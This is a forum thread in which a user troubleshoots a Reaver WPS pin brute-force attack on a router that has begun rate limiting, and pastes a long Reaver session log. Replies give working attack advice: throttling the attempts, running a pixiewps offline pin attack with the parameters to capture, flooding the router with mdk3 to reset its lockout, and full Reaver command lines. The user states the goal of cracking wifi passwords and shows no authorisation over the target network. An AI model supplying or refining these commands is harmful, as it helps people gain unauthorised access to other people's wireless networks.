reaver - further course of action

[flex0r]

Hey folks,

I have a problem with reaver. After a while I get "AP rate limiting". I think I have to change my settings but I don't know how. I hope you can help me. If you think you have interesting tutorials which can help me, feel free to post them.

Thank you in advance for your help!

Code: [Select]

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire & kib0rg

[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Nothing done, nothing to save.
[+] 0.00% complete. Elapsed time: 0d0h0m35s.
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 1
[+] Pin count advanced: 1. Max pin attempts: 11000
[+] Trying pin 00005678.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 2
[+] Pin count advanced: 2. Max pin attempts: 11000
[+] Trying pin 01235678.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 3
[+] Pin count advanced: 3. Max pin attempts: 11000
[+] Trying pin 11115670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 4
[+] Pin count advanced: 4. Max pin attempts: 11000
[+] Trying pin 22225672.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 5
[+] Pin count advanced: 5. Max pin attempts: 11000
[+] 0.05% complete. Elapsed time: 0d0h0m54s.
[+] Estimated Remaining time: 0d9h9m45s
[+] Trying pin 33335674.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 6
[+] Pin count advanced: 6. Max pin attempts: 11000
[+] Trying pin 44445676.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 44445676.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 44445676.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 44445676.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] 0.05% complete. Elapsed time: 0d0h1m20s.
[+] Estimated Remaining time: 3d7h24m4s
[+] Trying pin 44445676.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 44445676.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 44445676.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 44445676.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 7
[+] Pin count advanced: 7. Max pin attempts: 11000
[+] Trying pin 55555678.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 8
[+] Pin count advanced: 8. Max pin attempts: 11000
[+] 0.07% complete. Elapsed time: 0d0h1m45s.
[+] Estimated Remaining time: 1d12h38m24s
[+] Trying pin 66665670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 9
[+] Pin count advanced: 9. Max pin attempts: 11000
[+] Trying pin 77775672.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 10
[+] Pin count advanced: 10. Max pin attempts: 11000
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
^C
[+] Session saved.


[proxx]

This simply looks like a router that isnt vuln , not sure who dug you up and why they waited all these years but this attack is considered old and patched for the most part.

[flex0r]

But reaver successfully tested some pins? Don't get me wrong, I just want to understand why.

Is there another method to crack wifi passwords?

[white-knight]

Spend that money and just get the reaver pro , guaranteed to still not crack shit 


http://www.reaversystems.com/products/reaver-pro-ii

[0E 800]

I have a reaver pro, its shit. Your reaver IS working. You can see its trying the pins.
You are just going to have to wait for it to run its course.

I put up a review of Reaver Pro vs ReVdK3-r1 script.

https://www.youtube.com/watch?v=zf93xJ7xD2k

Also worth checking out is HT-WPS-Breaker.
https://github.com/SilentGhostX/HT-WPS-Breaker

[proxx]

But reaver successfully tested some pins? Don't get me wrong, I just want to understand why.

Is there another method to crack wifi passwords?

My bad , I didnt read all the way through.
Try lowering the rate to a few seconds, that does the trick in most cases.

[iTpHo3NiX]

Furthermore you can attempt to use reaver with pixiewps, if the routers vulnerable you'll have WPS pin in no time. Check the link in my signature for my tutorial on using reaver and pixiewps to do an offline bruteforce of the pin.

The short version is to run reaver as:
reaver -i <monitorinterface> -b <targetbssid> -c <channel> -vvv

Stop reaver after you receive ehash2 (M4 message) and then plug in the values for pixiewps, enonce, rnonce, authkey, ehash1, and ehash2. If the routers vulnerable you'll get the pin and then run:
reaver -i <monitorinterface> -b <targetbssid> -c <channel> -vvv --pin=12345678

[Biokinetix]

you could try mdk3 to try and reset the router after it locks up or rate limits. try:

mdk3 wlan1mon a -a <MAC> -m

unfortunately if it does work, it only resets the router so reaver can have another go but it will do the same again.

Also you can play around with some of reaver's commands. try the following command which worked for me in the passed:

reaver -i wlan1mon -b <AP BSSID> -c <channel number> -a -L --dh-small -vv -d 5

Takes a long time but you should eventualy crack it. hope it helps